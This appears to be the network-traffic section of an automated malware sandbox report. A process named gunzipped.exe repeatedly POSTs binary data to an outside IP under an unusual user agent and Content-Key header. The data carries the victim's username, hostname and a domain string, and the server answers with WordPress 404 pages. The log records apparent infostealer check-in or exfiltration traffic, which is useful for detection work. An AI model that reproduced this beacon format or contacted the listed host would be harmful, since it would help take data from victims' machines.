Apr 17, 2024 03:17:31.356888056 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:31.356930971 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:31.356973886 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:31.357012987 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:31.357052088 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:31.357089043 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49738	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:31.711087942 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:31.919425011 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:32.866765022 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:32.866831064 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:32.866868973 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:32.866905928 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:32.866946936 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:32.866987944 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:32.867031097 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:32.867070913 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:32.867110014 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:32.867151976 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49739	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:33.230597973 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:33.438812017 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:34.415122032 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:33 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:34.415174961 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:34.415191889 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:34.415225029 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:34.415246964 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:34.415265083 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:34.415297985 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:34.415318012 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
